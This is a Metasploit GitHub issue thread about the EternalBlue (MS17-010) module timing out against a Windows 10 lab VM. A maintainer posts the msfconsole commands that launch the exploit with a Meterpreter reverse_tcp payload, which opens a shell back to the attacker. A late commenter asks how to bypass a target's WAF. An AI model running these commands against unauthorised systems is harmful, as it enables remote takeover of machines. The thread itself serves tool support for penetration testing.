### ISSUE TITLE
ms17_010_eternalblue RubySMB::Error::CommunicationError: Read timeout expired when reading from the socket

### ISSUE THREAD

**Issue by aidanbxyz** [rapid7/metasploit-framework#13772]
## Steps to reproduce

1. Opened metasploit and used exploit/windows/smb/ms17_010_eternalblue
2. Set options and exploited.

Victim: Windows 10 build 1511 (Virtual Machine)

## Expected behavior

I expected it to complete the exploit and I would have a shell to the victim's computer.

## Current behavior

Does everything like expected until..

[*] 192.168.2.19:445 - Sending all but last fragment of exploit packet
[-] 192.168.2.19:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the socket (timeout=30)
[*] Exploit completed, but no session was created.

~/.msf4/logs/framework.log : https://pastebin.com/LL7ebz0r

### Metasploit version

Framework: 5.0.89-dev
Console: 5.0.89-dev

### I installed Metasploit with:
- [+] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

Kali Linux amd64

**Comment by aidanbxyz** [comment]
It is possible that the problem could be in the remote machine. I tested it on Blue on tryhackme and everything worked just fine.

**Comment by adfoster-r7** [comment]
Hi, it looks like your log shows an error with `ms17_010_eternalblue_win8` rather than `ms17_010_eternalblue`.

Could you try these steps instead?

  use windows/smb/ms17_010_eternalblue
  set RHOSTS x.x.x.x
  set LHOST x.x.x.x
  set PAYLOAD windows/x64/meterpreter/reverse_tcp
  options
  run

Remember to set RHOSTS to the target machine's IP, and LHOST to your IP on the tryhackme network. I have verified that the above works on the tryhackme blue room.

**Comment by adfoster-r7** [comment]
Closing as a duplicate of #13478

**Comment by Zeker62** [comment]
see your waf or security software

**Comment by HOOLY123M** [comment]
How do I bypass the waf of the target 
help me?
